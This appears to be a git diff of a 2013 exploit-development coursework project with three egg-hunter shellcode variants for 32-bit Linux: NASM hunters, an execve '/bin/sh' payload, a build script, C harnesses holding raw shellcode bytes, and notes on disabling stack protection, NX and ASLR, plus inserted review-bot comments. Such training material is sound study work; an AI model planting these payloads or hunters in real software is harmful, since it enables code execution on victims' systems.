@@ -0,0 +1,27 @@ +USAGE + +1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable) + + +2. Compile the shellcode with a custom "egg" (must be 8 bytes in length) + +access-scasd$ ./make.sh "MyEgg123" + [I] Using custom EGG mark: MyEgg123 + [+] Compiling payload.nasm ... + [+] Compiling hunter.nasm ... + [+] Extracting PAYLOAD code from payload ... + [+] Adding EGG mark to PAYLOAD ... + [+] Checking PAYLOAD code for NULLs ... + [+] Extracting HUNTER code from hunter ... + [+] Checking HUNTER code for NULLs ... + [+] Compiling shellcode.c ... +-rwx------. 1 arno arno 5132 Mar 27 23:37 ./shellcode + [+] All done! + + +3. Run the shellcode + +access-scasd$ ./shellcode +Hunter Length: 46 +Payload Length: 36 +sh-4.1$ diff --git a/exam3/access-scasd/hunter.nasm b/exam3/access-scasd/hunter.nasm new file mode 100644 index 0000000..5017a13 --- /dev/null +++ b/exam3/access-scasd/hunter.nasm 
@@ -0,0 +1,61 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . +; +; +; Filename: hunter.nasm *access-scasd modification +; Author: Andrey Arapov +; 2013 March +; +; + +section .data + egg1 equ "Egg-" ; DWORD Egg marker part1 + egg2 equ "Mark" ; DWORD Egg marker part2 + + +section .text +global _start + + +_start: + cld ; clear direction flag (DF) to use scasd properly + xor edx, edx ; Searching the whole memory + + ; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker +nextPage: + or dx, 0xfff ; The same as "add dx, 4095" (PAGE_SIZE) + +nextAddr: + inc edx ; Searching forward + + ; Checking if memory is accessible + push byte +0x21 ; 0x21 = 33 = __NR_access + pop eax ; EAX points to 0x21 + lea ebx, [edx+0x4] ; address to check + xor ecx, ecx ; 0: mode = F_OK + int 0x80 + cmp al, -14 ; -14 = EFAULT = Bad address. See /usr/include/asm-generic/errno-base.h + jz nextPage + + + ; Searching for the Egg marker (in current page of memory which is accessible) + mov eax, egg1 + mov edi, edx + scasd ; if EAX == EDI, then sets ZF and returns EDI which has address of = edx+0x4 + jnz nextAddr + + mov eax, egg2 + lea edi, [edx+4] ; address to check + scasd ; if EAX == EDI, then sets ZF and returns edi which has address of = edx+0x4 + jnz nextAddr + jmp edi diff --git a/exam3/access-scasd/make.sh b/exam3/access-scasd/make.sh new file mode 100755 index 0000000..00c5f73 --- /dev/null 
+++ b/exam3/access-scasd/make.sh 
@@ -0,0 +1,130 @@ +#!/usr/bin/env sh +# +# USAGE +# ./make.sh [Egg-Mark] +# +# NOTE +# Egg-Mark must be a plaintext with 8 bytes in length +# If Egg-Mark was not specified, the default one will be used. +# +# To specify a custom payload, simply modify the code of payload.nasm file. +# Alternativly, you can modify PAYLOADCODE= variable down below the code. +# + +ARG1=$1 + +if [ -z "$ARG1" ]; then + echo " [I] Argument not specified. Using default EGG mark." + ARG1="Egg-Mark"; +elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then + echo " [E] Custom EGG mark must be 8 bytes in length! Exiting." + exit 1; +else + echo " [I] Using custom EGG mark: "$ARG1 +fi + + +DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm +EGGMARK=$ARG1 +NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g')) + +# Uncomment to save EGGMARK in HEX +EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g') + +# Cleanup +rm -f shellcode payload.o payload hunter.o hunter + +echo " [+] Compiling payload.nasm ..." +nasm -f elf32 -o payload.o payload.nasm +ld -m elf_i386 -o payload payload.o + +echo " [+] Compiling hunter.nasm ..." +nasm -f elf32 -o hunter.o hunter.nasm +ld -m elf_i386 -o hunter hunter.o + +echo " [+] Extracting PAYLOAD code from payload ..." +PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s) + +echo " [+] Adding EGG mark to PAYLOAD ..." +FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g') + +echo " [+] Checking PAYLOAD code for NULLs ..." +if [[ $FULL_PAYLOADCODE == *00* ]]; then + echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting." + exit 1 +fi + + +echo " [+] Extracting HUNTER code from hunter ..." 
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g') + +# For debugging only +#echo ${DEFAULTEGG[0]} +#echo ${DEFAULTEGG[1]} +#echo ${NEWEGG[0]} +#echo ${NEWEGG[1]} + +# Preparing Default egg to HEX form in order to replace it with a New egg +DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') +DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') + +# Uncomment to save new EGGMARK in HEX format +NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') +NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') + +# Uncomment to save new EGGMARK in Plaintext format +#NEWEGG1=$(echo -n ${NEWEGG[0]}) +#NEWEGG2=$(echo -n ${NEWEGG[1]}) + + +FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g') + +echo " [+] Checking HUNTER code for NULLs ..." +if [[ $FULL_HUNTERCODE == *00* ]]; then + echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting." + exit 1 +fi + + +# Uncomment to see what will is replaced (default egg with a new one) +#echo $DEFEGG1 +#echo $DEFEGG2 +#echo $NEWEGG1 +#echo $NEWEGG2 +#echo $HUNTERCODE +#echo $FULL_HUNTERCODE + +cat > shellcode.c << EOF +#include +#include + +unsigned char hunter[] = \ +$FULL_HUNTERCODE; + +unsigned char garbage1[] = \ +"Just some garbage here..."; + +unsigned char payload[] = \ +$FULL_PAYLOADCODE; + +unsigned char garbage2[] = \ +"And some garbage there..."; + +main() +{ + printf("Hunter Length: %d\n", strlen(hunter)); + printf("Payload Length: %d\n", strlen(payload)); + int (*ret)() = (int(*)())hunter; + ret(); +} +EOF + +echo " [+] Compiling shellcode.c ..." 
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode + +# Cleanup +rm -f payload.o payload hunter.o hunter + +ls -la ./shellcode + +echo " [+] All done!" diff --git a/exam3/access-scasd/payload.nasm b/exam3/access-scasd/payload.nasm new file mode 100644 index 0000000..1ab23b8 --- /dev/null +++ b/exam3/access-scasd/payload.nasm @@ -0,0 +1,44 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . + +; Filename: payload-execve-stack.nasm +; Author: Andrey Arapov +; 2013 March + +global _start + + +section .text + +_start: + ; EAX + xor eax, eax + mov al, 11 ; execve syscall + + ; EBX + xor edx, edx + push edx ; NULL termination of '//bin/sh' string + push 0x68732f6e ; '//bin/sh' in reverse + push 0x69622f2f ; beginning of '//bin/sh' string is here + mov ebx, esp ; put the address of '//bin/sh' into ebx via esp + + ; ECX + push edx ; NULL termination of a stack + push ebx ; load our '//bin/sh' on a stack + mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string. + + ; EDX + push edx ; NULL terminator + mov edx, esp ; EDX is a PTR to a stack which has an address to NULL. + int 0x80 + diff --git a/exam3/access-scasd/shellcode.c b/exam3/access-scasd/shellcode.c new file mode 100644 index 0000000..e0102bc --- /dev/null +++ b/exam3/access-scasd/shellcode.c 
@@ -0,0 +1,18 @@ +#include +#include + +unsigned char hunter[] = "\xfc\x31\xd2\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x04\x31\xc9\xcd\x80\x3c\xf2\x74\xec\xb8\x48\x65\x72\x65\x89\xd7\xaf\x75\xe7\xb8\x49\x74\x49\x73\x8d\x7a\x04\xaf\x75\xdc\xff\xe7"; + +unsigned char garbage1[] = "Just some garbage here..."; + +unsigned char payload[] = "\x48\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80"; + +unsigned char garbage2[] = "And some garbage there..."; + +main() +{ + printf("Hunter Length: %d\n", strlen(hunter)); + printf("Payload Length: %d\n", strlen(payload)); + int (*ret)() = (int(*)())hunter; + ret(); +} diff --git a/exam3/access/NOTES b/exam3/access/NOTES new file mode 100644 index 0000000..088dd00 --- /dev/null +++ b/exam3/access/NOTES @@ -0,0 +1,11 @@ +NOTES + + no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice + + execstack: disables Executable space protection (NX). + Or Data Execution Prevention (DEP) on Windows, + or Write XOR Execute (W^X) on BSD. + CPU’s NX bit ("Never eXecute"). + + To disalbe Address Space Layout Randomization (ASLR) when running binary + setarch `arch` -R ./program diff --git a/exam3/access/USAGE b/exam3/access/USAGE new file mode 100644 index 0000000..5fb491d --- /dev/null +++ b/exam3/access/USAGE 
@@ -0,0 +1,27 @@ +USAGE + +1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable) + + +2. Compile the shellcode with a custom "egg" (must be 8 bytes in length) + +access$ ./make.sh "MyEgg123" + [I] Using custom EGG mark: MyEgg123 + [+] Compiling payload.nasm ... + [+] Compiling hunter.nasm ... + [+] Extracting PAYLOAD code from payload ... + [+] Adding EGG mark to PAYLOAD ... + [+] Checking PAYLOAD code for NULLs ... + [+] Extracting HUNTER code from hunter ... + [+] Checking HUNTER code for NULLs ... + [+] Compiling shellcode.c ... +-rwx------. 1 arno arno 5132 Mar 28 00:22 ./shellcode + [+] All done! + + +3. Run the shellcode + +access$ ./shellcode +Hunter Length: 44 +Payload Length: 36 +sh-4.1$ diff --git a/exam3/access/hunter.nasm b/exam3/access/hunter.nasm new file mode 100644 index 0000000..cd9c50d --- /dev/null +++ b/exam3/access/hunter.nasm 
@@ -0,0 +1,59 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . +; +; +; Filename: hunter.nasm *access modification +; Author: Andrey Arapov +; 2013 March +; +; + +section .data + egg1 equ "Egg-" ; DWORD Egg marker part1 + egg2 equ "Mark" ; DWORD Egg marker part2 + + +section .text +global _start + + +_start: + xor edx, edx ; Searching the whole memory + + + ; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker +nextPage: + or dx, 0xfff ; The same as "add dx, 4095" (PAGE_SIZE) + +nextAddr: + inc edx ; Searching forward + + ; Checking if memory is accessible + push byte +0x21 ; 0x21 = 33 = __NR_access + pop eax ; EAX points to 0x21 + lea ebx, [edx+0x8] ; next address to check + xor ecx, ecx ; 0: mode = F_OK + int 0x80 + cmp al, -14 ; -14 = EFAULT = Bad address. See /usr/include/asm-generic/errno-base.h + jz nextPage + + + ; Searching for the Egg marker (in current page of memory which is accessible) + cmp dword [edx], egg1 + jne nextAddr + cmp dword [edx+0x4], egg2 + jne nextAddr + + lea ecx, [edx+0x8] + jmp ecx + diff --git a/exam3/access/make.sh b/exam3/access/make.sh new file mode 100755 index 0000000..00c5f73 --- /dev/null +++ b/exam3/access/make.sh 
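Review bot: The comment on `or dx, 0xfff` (`The same as "add dx, 4095"`) is wrong once edx is mid-page: the OR rounds edx up to the last byte of the current page so that the following `inc edx` lands exactly on the next page boundary, which is what the loop relies on; `or dx, 0xfff ; move to the last byte of this page; the inc below starts the next page` states the real intent. Two more things worth a header note: the egg is compared as two separate DWORDs so the hunter's own immediates (egg1 and egg2 are 9 bytes apart in the encoded `cmp` instructions, as the bytes in shellcode.c show) never form a contiguous 8-byte match and the scan cannot stop on the hunter itself, and because the `access()` probe is taken at `edx+0x8` an egg whose last byte is the final byte of a mapped page bordering an unmapped one is skipped by the `jz nextPage` path. There is also no termination when no egg exists — edx wraps past 0xffffffff and the scan repeats forever — which is acceptable for a hunter but should be stated in NOTES.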
@@ -0,0 +1,130 @@ +#!/usr/bin/env sh +# +# USAGE +# ./make.sh [Egg-Mark] +# +# NOTE +# Egg-Mark must be a plaintext with 8 bytes in length +# If Egg-Mark was not specified, the default one will be used. +# +# To specify a custom payload, simply modify the code of payload.nasm file. +# Alternativly, you can modify PAYLOADCODE= variable down below the code. +# + +ARG1=$1 + +if [ -z "$ARG1" ]; then + echo " [I] Argument not specified. Using default EGG mark." + ARG1="Egg-Mark"; +elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then + echo " [E] Custom EGG mark must be 8 bytes in length! Exiting." + exit 1; +else + echo " [I] Using custom EGG mark: "$ARG1 +fi + + +DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm +EGGMARK=$ARG1 +NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g')) + +# Uncomment to save EGGMARK in HEX +EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g') + +# Cleanup +rm -f shellcode payload.o payload hunter.o hunter + +echo " [+] Compiling payload.nasm ..." +nasm -f elf32 -o payload.o payload.nasm +ld -m elf_i386 -o payload payload.o + +echo " [+] Compiling hunter.nasm ..." +nasm -f elf32 -o hunter.o hunter.nasm +ld -m elf_i386 -o hunter hunter.o + +echo " [+] Extracting PAYLOAD code from payload ..." +PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s) + +echo " [+] Adding EGG mark to PAYLOAD ..." +FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g') + +echo " [+] Checking PAYLOAD code for NULLs ..." +if [[ $FULL_PAYLOADCODE == *00* ]]; then + echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting." + exit 1 +fi + + +echo " [+] Extracting HUNTER code from hunter ..." 
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g') + +# For debugging only +#echo ${DEFAULTEGG[0]} +#echo ${DEFAULTEGG[1]} +#echo ${NEWEGG[0]} +#echo ${NEWEGG[1]} + +# Preparing Default egg to HEX form in order to replace it with a New egg +DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') +DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') + +# Uncomment to save new EGGMARK in HEX format +NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') +NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') + +# Uncomment to save new EGGMARK in Plaintext format +#NEWEGG1=$(echo -n ${NEWEGG[0]}) +#NEWEGG2=$(echo -n ${NEWEGG[1]}) + + +FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g') + +echo " [+] Checking HUNTER code for NULLs ..." +if [[ $FULL_HUNTERCODE == *00* ]]; then + echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting." + exit 1 +fi + + +# Uncomment to see what will is replaced (default egg with a new one) +#echo $DEFEGG1 +#echo $DEFEGG2 +#echo $NEWEGG1 +#echo $NEWEGG2 +#echo $HUNTERCODE +#echo $FULL_HUNTERCODE + +cat > shellcode.c << EOF +#include +#include + +unsigned char hunter[] = \ +$FULL_HUNTERCODE; + +unsigned char garbage1[] = \ +"Just some garbage here..."; + +unsigned char payload[] = \ +$FULL_PAYLOADCODE; + +unsigned char garbage2[] = \ +"And some garbage there..."; + +main() +{ + printf("Hunter Length: %d\n", strlen(hunter)); + printf("Payload Length: %d\n", strlen(payload)); + int (*ret)() = (int(*)())hunter; + ret(); +} +EOF + +echo " [+] Compiling shellcode.c ..." 
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode + +# Cleanup +rm -f payload.o payload hunter.o hunter + +ls -la ./shellcode + +echo " [+] All done!" diff --git a/exam3/access/payload.nasm b/exam3/access/payload.nasm new file mode 100644 index 0000000..1ab23b8 --- /dev/null +++ b/exam3/access/payload.nasm @@ -0,0 +1,44 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . + +; Filename: payload-execve-stack.nasm +; Author: Andrey Arapov +; 2013 March + +global _start + + +section .text + +_start: + ; EAX + xor eax, eax + mov al, 11 ; execve syscall + + ; EBX + xor edx, edx + push edx ; NULL termination of '//bin/sh' string + push 0x68732f6e ; '//bin/sh' in reverse + push 0x69622f2f ; beginning of '//bin/sh' string is here + mov ebx, esp ; put the address of '//bin/sh' into ebx via esp + + ; ECX + push edx ; NULL termination of a stack + push ebx ; load our '//bin/sh' on a stack + mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string. + + ; EDX + push edx ; NULL terminator + mov edx, esp ; EDX is a PTR to a stack which has an address to NULL. + int 0x80 + diff --git a/exam3/access/shellcode.c b/exam3/access/shellcode.c new file mode 100644 index 0000000..de0a7a1 --- /dev/null +++ b/exam3/access/shellcode.c 
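Review bot: The script declares `#!/usr/bin/env sh` but the hunk is full of bash-only constructs — the array assignment `DEFAULTEGG=(...)`, `${NEWEGG[0]}`, and `[[ $FULL_HUNTERCODE == *00* ]]` — so wherever `sh` is dash it dies with a syntax error before compiling anything; the shebang should read `#!/usr/bin/env bash`. The egg-length check `expr length $ARG1` counts characters rather than bytes and leaves `$ARG1` unquoted, so a multibyte or space-containing egg passes the "8 bytes" test, and the `od` output substituted for the two 4-byte `cmp` immediates in `FULL_HUNTERCODE` is then longer than what it replaces, silently corrupting the hunter's instruction encoding; `elif [ "$(printf %s "$ARG1" | wc -c)" -ne 8 ]; then` enforces the byte length the hunter actually compares. The `-ge 8 && -le 8` pair is simply `-eq 8` and is clearer written that way.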
@@ -0,0 +1,18 @@ +#include +#include + +unsigned char hunter[] = "\x31\xd2\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x08\x31\xc9\xcd\x80\x3c\xf2\x74\xec\x81\x3a\x48\x65\x72\x65\x75\xe9\x81\x7a\x04\x49\x74\x49\x73\x75\xe0\x8d\x4a\x08\xff\xe1"; + +unsigned char garbage1[] = "Just some garbage here..."; + +unsigned char payload[] = "\x48\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80"; + +unsigned char garbage2[] = "And some garbage there..."; + +main() +{ + printf("Hunter Length: %d\n", strlen(hunter)); + printf("Payload Length: %d\n", strlen(payload)); + int (*ret)() = (int(*)())hunter; + ret(); +} diff --git a/exam3/basic/NOTES b/exam3/basic/NOTES new file mode 100644 index 0000000..088dd00 --- /dev/null +++ b/exam3/basic/NOTES @@ -0,0 +1,11 @@ +NOTES + + no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice + + execstack: disables Executable space protection (NX). + Or Data Execution Prevention (DEP) on Windows, + or Write XOR Execute (W^X) on BSD. + CPU’s NX bit ("Never eXecute"). + + To disalbe Address Space Layout Randomization (ASLR) when running binary + setarch `arch` -R ./program diff --git a/exam3/basic/USAGE b/exam3/basic/USAGE new file mode 100644 index 0000000..f70903e --- /dev/null +++ b/exam3/basic/USAGE 
@@ -0,0 +1,27 @@ +USAGE + +1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable) + + +2. Compile the shellcode with a custom "egg" (must be 8 bytes in length) + +basic$ ./make.sh "egg.MaRk" + [I] Using custom EGG mark: egg.MaRk + [+] Compiling payload.nasm ... + [+] Compiling hunter.nasm ... + [+] Extracting PAYLOAD code from payload ... + [+] Adding EGG mark to PAYLOAD ... + [+] Checking PAYLOAD code for NULLs ... + [+] Extracting HUNTER code from hunter ... + [+] Checking HUNTER code for NULLs ... + [+] Compiling shellcode.c ... +-rwx------. 1 arno arno 5100 Mar 28 13:17 ./shellcode + [+] All done! + + +3. Run the shellcode + +basic$ ./shellcode +Hunter Length: 21 +Payload Length: 36 +sh-4.1$ exit diff --git a/exam3/basic/hunter.nasm b/exam3/basic/hunter.nasm new file mode 100644 index 0000000..da46f05 --- /dev/null +++ b/exam3/basic/hunter.nasm 
@@ -0,0 +1,40 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . +; +; +; Filename: hunter.nasm +; Author: Andrey Arapov +; 2013 March +; +; + +section .data + egg1 equ "Egg-" ; DWORD Egg marker part1 + egg2 equ "Mark" ; DWORD Egg marker part2 + + +section .text +global _start + + +_start: + ; Searching for the Egg marker +next: + inc eax ; Searching forward (can also try dec eax) +isEgg: + cmp dword [eax-8], egg1 ; Checking if we can see egg1 + jne next ; If not, continuing to search + cmp dword [eax-4], egg2 + jne next + + call eax ; Once found, we call our payload diff --git a/exam3/basic/make.sh b/exam3/basic/make.sh new file mode 100755 index 0000000..00c5f73 --- /dev/null +++ b/exam3/basic/make.sh 
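Review bot: The scan starts from whatever eax holds at entry and reads `[eax-8]` with no accessibility probe, so the first unmapped page it touches kills the process with SIGSEGV; nothing in the file says this, and `; Searching forward (can also try dec eax)` reads as if the start value were arbitrary. A header line would make the contract explicit: `; Assumes eax already points below the egg and that every page from eax up to the egg is mapped; no access() probing here, use the access/ variant for a real target`. Presumably in the bundled shellcode.c harness eax still holds the address of the hunter buffer when `ret()` is called, which is why the payload declared a few bytes later is found without faulting, but that is a property of the harness rather than of the hunter and should be confirmed. The `isEgg:` label is never referenced and can be dropped.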
@@ -0,0 +1,130 @@ +#!/usr/bin/env sh +# +# USAGE +# ./make.sh [Egg-Mark] +# +# NOTE +# Egg-Mark must be a plaintext with 8 bytes in length +# If Egg-Mark was not specified, the default one will be used. +# +# To specify a custom payload, simply modify the code of payload.nasm file. +# Alternativly, you can modify PAYLOADCODE= variable down below the code. +# + +ARG1=$1 + +if [ -z "$ARG1" ]; then + echo " [I] Argument not specified. Using default EGG mark." + ARG1="Egg-Mark"; +elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then + echo " [E] Custom EGG mark must be 8 bytes in length! Exiting." + exit 1; +else + echo " [I] Using custom EGG mark: "$ARG1 +fi + + +DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm +EGGMARK=$ARG1 +NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g')) + +# Uncomment to save EGGMARK in HEX +EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g') + +# Cleanup +rm -f shellcode payload.o payload hunter.o hunter + +echo " [+] Compiling payload.nasm ..." +nasm -f elf32 -o payload.o payload.nasm +ld -m elf_i386 -o payload payload.o + +echo " [+] Compiling hunter.nasm ..." +nasm -f elf32 -o hunter.o hunter.nasm +ld -m elf_i386 -o hunter hunter.o + +echo " [+] Extracting PAYLOAD code from payload ..." +PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s) + +echo " [+] Adding EGG mark to PAYLOAD ..." +FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g') + +echo " [+] Checking PAYLOAD code for NULLs ..." +if [[ $FULL_PAYLOADCODE == *00* ]]; then + echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting." + exit 1 +fi + + +echo " [+] Extracting HUNTER code from hunter ..." 
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g') + +# For debugging only +#echo ${DEFAULTEGG[0]} +#echo ${DEFAULTEGG[1]} +#echo ${NEWEGG[0]} +#echo ${NEWEGG[1]} + +# Preparing Default egg to HEX form in order to replace it with a New egg +DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') +DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') + +# Uncomment to save new EGGMARK in HEX format +NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') +NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') + +# Uncomment to save new EGGMARK in Plaintext format +#NEWEGG1=$(echo -n ${NEWEGG[0]}) +#NEWEGG2=$(echo -n ${NEWEGG[1]}) + + +FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g') + +echo " [+] Checking HUNTER code for NULLs ..." +if [[ $FULL_HUNTERCODE == *00* ]]; then + echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting." + exit 1 +fi + + +# Uncomment to see what will is replaced (default egg with a new one) +#echo $DEFEGG1 +#echo $DEFEGG2 +#echo $NEWEGG1 +#echo $NEWEGG2 +#echo $HUNTERCODE +#echo $FULL_HUNTERCODE + +cat > shellcode.c << EOF +#include +#include + +unsigned char hunter[] = \ +$FULL_HUNTERCODE; + +unsigned char garbage1[] = \ +"Just some garbage here..."; + +unsigned char payload[] = \ +$FULL_PAYLOADCODE; + +unsigned char garbage2[] = \ +"And some garbage there..."; + +main() +{ + printf("Hunter Length: %d\n", strlen(hunter)); + printf("Payload Length: %d\n", strlen(payload)); + int (*ret)() = (int(*)())hunter; + ret(); +} +EOF + +echo " [+] Compiling shellcode.c ..." 
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode + +# Cleanup +rm -f payload.o payload hunter.o hunter + +ls -la ./shellcode + +echo " [+] All done!" diff --git a/exam3/basic/payload.nasm b/exam3/basic/payload.nasm new file mode 100644 index 0000000..1ab23b8 --- /dev/null +++ b/exam3/basic/payload.nasm @@ -0,0 +1,44 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . + +; Filename: payload-execve-stack.nasm +; Author: Andrey Arapov +; 2013 March + +global _start + + +section .text + +_start: + ; EAX + xor eax, eax + mov al, 11 ; execve syscall + + ; EBX + xor edx, edx + push edx ; NULL termination of 